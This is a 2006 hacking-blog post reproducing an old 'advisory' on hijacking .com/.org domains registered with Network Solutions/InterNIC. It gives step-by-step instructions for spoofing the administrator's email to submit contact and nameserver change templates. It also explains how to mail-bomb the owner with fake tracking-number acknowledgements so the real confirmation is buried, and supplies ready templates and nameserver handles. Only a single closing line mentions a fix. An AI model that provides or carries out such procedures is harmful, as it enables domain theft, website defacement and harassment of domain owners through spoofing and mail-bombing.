• Skip to main content
  • Skip to primary sidebar
  • Skip to footer
  • Home
  • About Darknet
  • Hacking Tools
  • Popular Posts
  • Darknet Archives
  • Contact Darknet
    • Advertise
    • Submit a Tool
Darknet – Hacking Tools, Hacker News & Cyber Security

Darknet - Hacking Tools, Hacker News & Cyber Security

Darknet is your best source for the latest hacking tools, hacker news, cyber security best practices, ethical hacking & pen-testing.

Domain Stealing or How to Hijack a Domain

September 20, 2006

Views: 61,372

[ad]

Please note this is an old technique again, just for learning purposes, learn how the old techniques worked and why they worked, then try and discover new ways to do things.

Summary

The sole purpose of the information contained in this advisory is to point out the flaws in InterNIC’s domain name handling system and is intended for educational use only. Since this is public knowledge, it should be also in everyone’s reach.

The technique described below involves an easy to follow procedure of stealing .com/.net/.org/.gov/.mil domain names.

This vulnerability has been publicly known for quite a while, and there are ways to prevent it. The procedure below enables an attacker to take over a domain name, enabling him or her to make the arbitrary web address (www.example.com) point to any desired web page on the Internet. This method of domain hijacking is constantly being used to hijack domain names, and to deface web sites.

THIS DOCUMENT SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY.

Details

Required ingredients:

  • Anonymous remailer or mail bomber that can spoof email addresses.
  • Social Engineering skills for timing the emails.
  • A fake email address at hotmail.com or any other free service.

Exploit:
As an example for this advisory, we will take the domain name example.org. Go to http://www.networksolutions.com and click on the link that says ‘Who Is.’ Now enter the domain name (example.org in this case) in the search field and click on the ‘Search’ button. This would show you the WhoIs information, which will be similar to the one shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Registrant:
Example (ex24-DOM)
   Address details
 
   Domain Name: EXAMPLE.ORG
 
   Administrative Contact, Technical Contact, Zone Contact,
   Billing Contact:
      DOMAIN, ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM
 
 
   Record last updated on 00-Jan-2000.
   Record created on 00-Jan-2000.
   Database last updated on 3-Feb-2000 14:29:53 EST.
 
   Domain servers in listed order:
 
   NS1.EXAMPLE.COM 1.2.3.4
   NS2.EXAMPLE.NET 1.2.3.5

Now you have two choices:

1) Either you could take full control of the domain by changing the Administrator’s handle information.

Or

2) You could simply point the domain to another host and let it recover in time by itself.

Initiating the First Attack:

Let us first explain the InterNIC authentication system in case most of you would be the readers who do not have their own domain names. The problem with InterNIC authentication is that they do NOT send a confirmation email if the request is sent from the same email as the person owning the contact or the domain name itself! Therefore, utilizing this flaw one could spoof anyone’s email address and change any domain name’s information.

Although, a confirmation is required from the person to whom the domain is about to be transferred; and that shouldn’t be too hard as it would your own email address.

Here’s a step-by-step procedure:

  • Go to http://www.networksolutions.com/
  • Click on the link that says ‘Make Changes.’
  • Enter the domain name example.org
  • You should be presented with 2 blue buttons
  • Click on the one that says *Expert*
  • Next screen would have a heading ‘Select the form that meets your needs’
  • Click on the link that say ‘Contact Form’
  • Next you should see a form with 2 fields.
  • In the first field enter the admin’s handle (example.org admin is ADM001)
  • In the next field enter his/her email address (in this case it’s [email protected])
  • Change the option to ‘Modify.’
  • Now ‘Proceed to Contact Information.’
  • Select the MAIL-FROM option and click the ‘Go on to Contact Data Information.’
  • Now you should see all the information about the admin contact of domain
    name!
  • In the E-mail address field change the email to your own fake email. (in this case it’s [email protected])
  • Now ‘Proceed to Set Authorization Scheme.’
  • Again choose MAIL-FROM and enter the email address of the admin ([email protected])
  • Leave the bottom option to ‘No’ and ‘Generate Contact Form.’

Now you should see a template with all the information. Similar to this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
******** Please DO NOT REMOVE Version Number ********
 
Contact Version Number: 1.0
 
******** Please see attached detailed instructions ********
 
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
 
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com
 
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
 
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT press the button at the bottom that says ‘Mail this contact form to me!’

Copy and paste this message into your anonymous remailer or mailbomber and you are ready to go; but WAIT! It’s not that easy, now comes the HARD part! When you mail this message to [email protected] a message similar to the following would be sent to the admin email address:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Subject: [NIC-000128.4r50] Your Mail
______________________________________________________________
This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed.
 
If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.
 
If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's:
 
   Domain Name Registration Service Agreement
      http://www.networksolutions.com/legal/service-agreement.html
   Domain Name Registration Template
      ftp://www.networksolutions.com/templates/domain-template.txt
 
Regards,
Network Solutions Registration Services
 
***********************************************
 
***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at
ftp://www.networksolutions.com/templates/domain-template.txt
for all template requests.
 
The terms and conditions of the Service Agreement are available on our Web site at: http://www.networksolutions.com/legal/service-agreement.html.
************************************************
 
The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.
 
Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant's address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.
 
To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is available on our Web site at www.networksolutions.com
 
To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site.
 
Network Solutions Registration Services
e-mail: help@networksolutions.com

You should now be thinking that this message could get you in trouble but there is a way of getting rid of this trouble. Here you’ll use your mailbomber to mailbomb the guy with 20-30 similar messages if you want your attack to be successful. The person would see 35 messages from the same address and therefore would delete all of them and you’d probably be safe. If he ‘would’ email someone then he would probably reply to the wrong tracking number. In the above case, the tracking number is [NIC-000128.4r50]. OK, here another hard part. You have to open your notepad and generate similar numbers actually come up with them.

You should NEVER mailbomb the person with the same tracking number. What we mean
is that you should never send more than one emails to him from [NIC-000128.4r50] in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or something different. Here is a list of some numbers that we generated just to give you a good idea of how the scheme works.

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]

Remember to change the number at both places. In the subject as well as the email body!

In the case of example.org you will send the email messages to [email protected] from [email protected]. The message subject and body are already described above.

Stop after you have mailed him/her 10-15 messages! Now it’s time to email [email protected] with our fake email as [email protected] So again, in this case the message will be sent to [email protected] from [email protected] with the following template that we created above:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
******** Please DO NOT REMOVE Version Number ********
 
Contact Version Number: 1.0
 
******** Please see attached detailed instructions ********
 
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
 
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com
 
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
 
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT put anything in the Subject!

Just send one email! DO NOT bomb [email protected] with more than one email. That’s pretty much it. Now continue to bomb [email protected], changing the tracking number every time until your 30-35 tracking numbers are used up!

Now all you have to do is wait. After 24 hours you could go and change the domain information and no one would be there to stop you because now you are the admin of the domain name!

NOTE: This attack will only work on domains that have an admin contact different from their technical contact!

Initiating the Second Attack:

This attack will be successful even if the technical and admin contact are the same.
The procedure is basically the same apart from the fact that this time:

  • Go to http://www.networksolutions.com/
  • Click on the link that says ‘Make Changes.’
  • Enter the domain name example.org
  • You should be presented with 2 blue buttons
  • Click on the one that says *Expert*
  • Next screen would have a heading ‘Select the form that meets your needs’
  • Click on the link that say ‘Service Agreement.’
  • Now when it asks for email address, enter your own.
  • Now you should see many fields, don’t panic!
  • Go to the technical contact and change the handle to freeservers, hypermart e.t.c.
  • Now come to ‘Nameserver Information.’
  • Change the nameservers to hypermart or freeserver nameservers.
  • If there’s anything in the ‘Optional Information’ after that then simply delete them.
  • Click on the button ‘Submit this form for processing.’

You are done, the form will be emailed to your email address. When the form arrives in your email, then simply take this part:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
**** PLEASE DO NOT REMOVE Version Number or any of the information below when submitting this template to hostmaster@networksolutions.com. *****
 
Domain Version Number: 5.0
 
******** Email completed agreement to hostmaster@networksolutions.com ********
 
 
AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) through our online application process or by applying for and registering a domain name as part of our e-mail template application process or by using the service(s) provided by Network Solutions under the Service Agreement, Version 5.0, you acknowledge that you have read and agree to be bound by all terms and conditions of this Agreement and any pertinent rules or policies that are or may be published by Network Solutions.
 
Please find the Network Solutions Service Agreement, Version 5.0 located at the URL href="http://www.networksolutions.com/legal/service-agreement.html"> http://www.networksolutions.com/legal/service-agreement.html.
 
 
[ URL ftp://www.networksolutions.com ] [11/99]
 
Authorization
0a. (N)ew (M)odify (D)elete.........: M Name Registration
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth Info.......................:
 
1. Comments........................:
 
2. Complete Domain Name............: example.org
 
Organization Using Domain Name
3a. Organization Name................: EXAMPLE
3b. Street Address..................:
3c. City............................:
3d. State...........................:
3e. Postal Code.....................:
3f. Country.........................:
 
Administrative Contact
4a. NIC Handle (if known)...........: ADM001
4b. (I)ndividual (R)ole?............: Individual
4c. Name (Last, First)..............:
4d. Organization Name...............:
4e. Street Address..................:
4f. City............................:
4g. State...........................:
4h. Postal Code.....................:
4i. Country.........................:
4j. Phone Number....................:
4k. Fax Number......................:
4l. E-Mailbox.......................:
 
Technical Contact
5a. NIC Handle (if known)...........: BDM002
5b. (I)ndividual (R)ole?............: Individual
5c. Name(Last, First)...............:
5d. Organization Name...............:
5e. Street Address..................:
5f. City............................:
5g. State...........................:
5h. Postal Code.....................:
5i. Country.........................:
5j. Phone Number....................:
5k. Fax Number......................:
5l. E-Mailbox.......................:
 
Billing Contact
6a. NIC Handle (if known)...........: ADM001
6b. (I)ndividual (R)ole?............: Individual
6c. Name (Last, First)..............:
6d. Organization Name...............:
6e. Street Address..................:
6f. City............................:
6g. State...........................:
6h. Postal Code.....................:
6i. Country.........................:
6j. Phone Number....................:
6k. Fax Number......................:
6l. E-Mailbox.......................:
 
Prime Name Server
7a. Primary Server Hostname.........: NS1.EXAMPLE.COM
7b. Primary Server Netaddress.......: 1.2.3.4
 
Secondary Name Server(s)
8a. Secondary Server Hostname.......: NS2.EXAMPLE.NET
8b. Secondary Server Netaddress.....: 1.2.3.5
 
END OF AGREEMENT
 
For instructions, please refer to:
"http://www.networksolutions.com/help/inst-mod.html"

Now launch your anonymous remailer or mailbomber.

  • From: the domain admin ([email protected] in this case).
  • To: [email protected]
  • Subject: (do not enter any subject, leave the field blank!)
  • Body: the template you created above.
  • You are ready to go but before you send this email to InterNIC, remember to bomb [email protected] with similar emails but different tracking numbers as we did in the first procedure.
  • After sending 10-20 emails, send the above template to InterNIC.
  • Continue bombing your 40 messages. Remember to generate 40-50 tracking numbers.
    This is basically it.
  • The domain would be transferred to freeservers or hypermart and then you could simply activate it from there on your own email address. Remember to use a fake email.

Nameservers and Handles:

Freeservers Technical Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154

Hypermart Technical Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66

______________________________________________________________

Possible Fixes:

Enable the CRYPT-FW password mechanism. This should prevent anyone without this password from changing your domain information (see the Internic contact form for more information)

Originally By Lucifer Mirza aka Bufferman – Updated by Darknet.

Share
Tweet2
Share
Buffer
WhatsApp
Email
2 Shares

Filed Under: Networking Hacking Tools, Social Engineering



Reader Interactions

Comments

  1. hobot says

    September 20, 2006 at 9:19 pm

    Oh snap.

  2. Tyler says

    October 7, 2006 at 7:08 pm

    thanks to whoever wrote this , very informative

  3. sirhackypants says

    November 1, 2006 at 8:51 pm

    SO you guys pulled a quick one with this thanks a lot!

  4. Needhelp says

    November 13, 2006 at 5:50 pm

    Help needed on how to take back a domain name which was used by someone who impersonated our company and stealing away all our clients . Please reply .

  5. Roger Wray says

    May 20, 2007 at 1:37 pm

    Telling about how a hijacking is done only serves to information to those that want to hijack. I only wanted to know how to stop the hijacking. This article is by someone that is in the hijacking buisness and wants everyone know how to do it.

  6. Daniel says

    June 4, 2007 at 8:57 am

    THIS DOCUMENT SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY.

    haha okay ill hack my own domains. yeah

  7. sayeed says

    July 2, 2007 at 8:55 am

    Hey buddies, I can’t find the “make changes” link in http://www.networksolutions.com . Please help me out !!!!

  8. lyz says

    August 15, 2008 at 12:45 pm

    Yeah. You can play with your own domains just to check the weakness of some applications nowadays.

  9. Navin says

    August 15, 2008 at 5:58 pm

    @ daniel….tht’s wht U’re expected to do…or for Ure clients (who’ve already been informed of these tests being carried out)…..”ETHICAL” hacking remember??

  10. lyz says

    August 16, 2008 at 5:34 am

    and that is the reason why we are all here. To learn.

  11. Morgan Storey says

    August 16, 2008 at 7:49 am

    Heh microsoft opened there servers to “pen testing” so have at them. Of course sharpen your skills then let them know or just do this on your own domains to find weaknesses.

Primary Sidebar

Search Darknet

  • Email
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Advertise on Darknet

Latest Posts

Falco - Real-Time Threat Detection for Linux and Containers

Falco – Real-Time Threat Detection for Linux and Containers

Views: 330

Security visibility inside containers, Kubernetes, and cloud workloads remains among the hardest … ...More about Falco – Real-Time Threat Detection for Linux and Containers

Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance

Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance

Views: 627

As threat surfaces grow and attack sophistication increases, many security teams face the same … ...More about Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance

Best Open Source HIDS Tools for Linux in 2025 (Compared & Ranked)

Views: 571

With more businesses running Linux in production—whether in bare metal, VMs, or containers—the need … ...More about Best Open Source HIDS Tools for Linux in 2025 (Compared & Ranked)

SUDO_KILLER - Auditing Sudo Configurations for Privilege Escalation Paths

SUDO_KILLER – Auditing Sudo Configurations for Privilege Escalation Paths

Views: 607

sudo is a powerful utility in Unix-like systems that allows permitted users to execute commands with … ...More about SUDO_KILLER – Auditing Sudo Configurations for Privilege Escalation Paths

Bantam - Advanced PHP Backdoor Management Tool For Post Exploitation

Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation

Views: 462

Bantam is a lightweight post-exploitation utility written in C# that includes advanced payload … ...More about Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation

AI-Powered Cybercrime in 2025 - The Dark Web’s New Arms Race

AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race

Views: 691

In 2025, the dark web isn't just a marketplace for illicit goods—it's a development lab. … ...More about AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race

Topics

  • Advertorial (28)
  • Apple (46)
  • Countermeasures (228)
  • Cryptography (82)
  • Database Hacking (89)
  • Events/Cons (7)
  • Exploits/Vulnerabilities (431)
  • Forensics (65)
  • GenAI (3)
  • Hacker Culture (8)
  • Hacking News (229)
  • Hacking Tools (684)
  • Hardware Hacking (82)
  • Legal Issues (179)
  • Linux Hacking (74)
  • Malware (238)
  • Networking Hacking Tools (352)
  • Password Cracking Tools (104)
  • Phishing (41)
  • Privacy (219)
  • Secure Coding (118)
  • Security Software (235)
  • Site News (51)
    • Authors (6)
  • Social Engineering (37)
  • Spammers & Scammers (76)
  • Stupid E-mails (6)
  • Telecomms Hacking (6)
  • UNIX Hacking (6)
  • Virology (6)
  • Web Hacking (384)
  • Windows Hacking (169)
  • Wireless Hacking (45)

Security Blogs

  • Dancho Danchev
  • F-Secure Weblog
  • Google Online Security
  • Graham Cluley
  • Internet Storm Center
  • Krebs on Security
  • Schneier on Security
  • TaoSecurity
  • Troy Hunt

Security Links

  • Exploits Database
  • Linux Security
  • Register – Security
  • SANS
  • Sec Lists
  • US CERT

Footer

Most Viewed Posts

  • Brutus Password Cracker – Download brutus-aet2.zip AET2 (2,298,145)
  • Darknet – Hacking Tools, Hacker News & Cyber Security (2,173,106)
  • Top 15 Security Utilities & Download Hacking Tools (2,096,640)
  • 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) (1,199,691)
  • Password List Download Best Word List – Most Common Passwords (933,528)
  • wwwhack 1.9 – wwwhack19.zip Web Hacking Software Free Download (776,171)
  • Hack Tools/Exploits (673,301)
  • Wep0ff – Wireless WEP Key Cracker Tool (530,185)

Search

Recent Posts

  • Falco – Real-Time Threat Detection for Linux and Containers May 19, 2025
  • Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance May 16, 2025
  • Best Open Source HIDS Tools for Linux in 2025 (Compared & Ranked) May 14, 2025
  • SUDO_KILLER – Auditing Sudo Configurations for Privilege Escalation Paths May 12, 2025
  • Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation May 9, 2025
  • AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race May 7, 2025

Tags

apple botnets computer-security darknet Database Hacking ddos dos exploits fuzzing google hacking-networks hacking-websites hacking-windows hacking tool Information-Security information gathering Legal Issues malware microsoft network-security Network Hacking Password Cracking pen-testing penetration-testing Phishing Privacy Python scammers Security Security Software spam spammers sql-injection trojan trojans virus viruses vulnerabilities web-application-security web-security windows windows-security Windows Hacking worms XSS

Copyright © 1999–2025 Darknet All Rights Reserved · Privacy Policy